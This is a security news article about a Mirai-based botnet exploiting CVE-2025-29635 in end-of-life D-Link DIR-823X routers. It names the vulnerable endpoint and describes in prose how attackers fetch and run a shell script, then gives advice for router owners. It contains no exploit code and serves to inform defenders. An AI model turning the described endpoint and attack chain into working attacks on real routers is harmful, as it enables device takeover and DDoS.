Active Exploitation of a Long-Known D-Link Vulnerability
A new botnet campaign built on the notorious Mirai malware framework is actively targeting D-Link DIR-823X routers by weaponizing CVE-2025-29635, a high-severity command-injection vulnerability. Researchers at Akamai's Security Intelligence and Response Team (SIRT) detected the campaign in early March 2026, marking the first confirmed instance of in-the-wild exploitation of this particular flaw.
What makes this situation especially concerning is the timeline: the vulnerability was originally disclosed 13 months before the campaign was detected, reported by security researchers Wang Jinshuai and Zhao Jiangting. Despite the relatively long window since disclosure, no active exploitation had previously been observed — until now.
How CVE-2025-29635 Works
The vulnerability resides in firmware versions 240126 and 24082 of the D-Link DIR-823X series. According to Akamai's report, the flaw allows an authenticated attacker to execute arbitrary commands on a remote device by sending a crafted HTTP POST request to a specific endpoint.
"This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via the corresponding function, which can trigger remote command execution."
In essence, exploiting CVE-2025-29635 is a matter of crafting the right POST request — a low barrier for even modestly skilled threat actors once working knowledge of the endpoint is available.
A Brief Proof-of-Concept and Its Aftermath
Shortly after the vulnerability was disclosed, the researchers who discovered it published a proof-of-concept (PoC) exploit on GitHub. The PoC was later retracted, but its brief availability may have provided enough technical detail for threat actors to develop their own working exploits. Akamai's honeypot infrastructure subsequently captured the attack traffic that confirmed active exploitation was underway.
Attack Chain: From POST Request to Botnet Enrollment
The observed attack pattern follows a consistent sequence of steps. Threat actors send POST requests to vulnerable routers that perform the following actions:
- Change directories across writable file system paths on the target device.
- Download a shell script named dlink.sh from an external IP address under the attacker's control.
- Execute the downloaded script to complete the infection.
Once the script runs, it installs a Mirai-based malware strain that Akamai has identified as tuxnokill. The malware is compiled to support multiple CPU architectures, broadening the range of devices it can infect.
Capabilities of the tuxnokill Malware
Like its Mirai lineage would suggest, tuxnokill is primarily designed to conduct distributed denial-of-service (DDoS) attacks. Its documented attack methods include:
- TCP SYN flood
- TCP ACK flood
- TCP STOMP flood
- UDP flood
- HTTP null flood
These capabilities allow the botnet to conduct volumetric and application-layer attacks, making compromised routers useful tools for disrupting online services.
The Same Actor Is Targeting TP-Link and ZTE Devices
Akamai's investigation revealed that the threat actor behind the tuxnokill campaign is not limiting their efforts to D-Link hardware alone. The same attacker has been observed exploiting CVE-2023-1389, a vulnerability affecting TP-Link routers, as well as a separate remote code execution flaw in ZTE ZXV10 H108L routers.
In all three cases, the attack pattern was essentially identical, culminating in the deployment of a Mirai-based payload. This consistent methodology suggests a single, organized threat actor operating a coordinated multi-platform botnet recruitment campaign.
End-of-Life Status Eliminates Hope for an Official Patch
The D-Link DIR-823X routers affected by CVE-2025-29635 reached end of life (EoL) in November 2024. Under D-Link's standard policy, the company does not issue security patches for EoL products — and critically, the vendor has made clear it does not create exceptions even when active exploitation of a vulnerability is underway. This means owners of these routers should not expect an official fix.
BleepingComputer reached out to D-Link for comment on the reported exploitation activity and the status of any potential remediation, and indicated it would update coverage upon receiving a response.
What Affected Router Owners Should Do
Given the absence of a forthcoming patch and the confirmed active exploitation, users still running D-Link DIR-823X routers or other EoL devices are strongly encouraged to take the following steps:
- Replace the device with a newer router model that receives regular, vendor-supported security updates.
- Disable remote administration interfaces if they are not actively needed, reducing the attack surface.
- Change default administrator credentials immediately, since the vulnerability requires authentication and default passwords are widely known.
- Monitor for unexpected configuration changes that could indicate the device has already been compromised.
The tuxnokill campaign is a stark reminder that end-of-life network devices do not simply become less useful — they become liabilities. With a proof-of-concept having been briefly public and a coordinated threat actor already incorporating multiple router exploits into a single campaign, the window for complacency has firmly closed for DIR-823X owners.
Source: BleepingComputer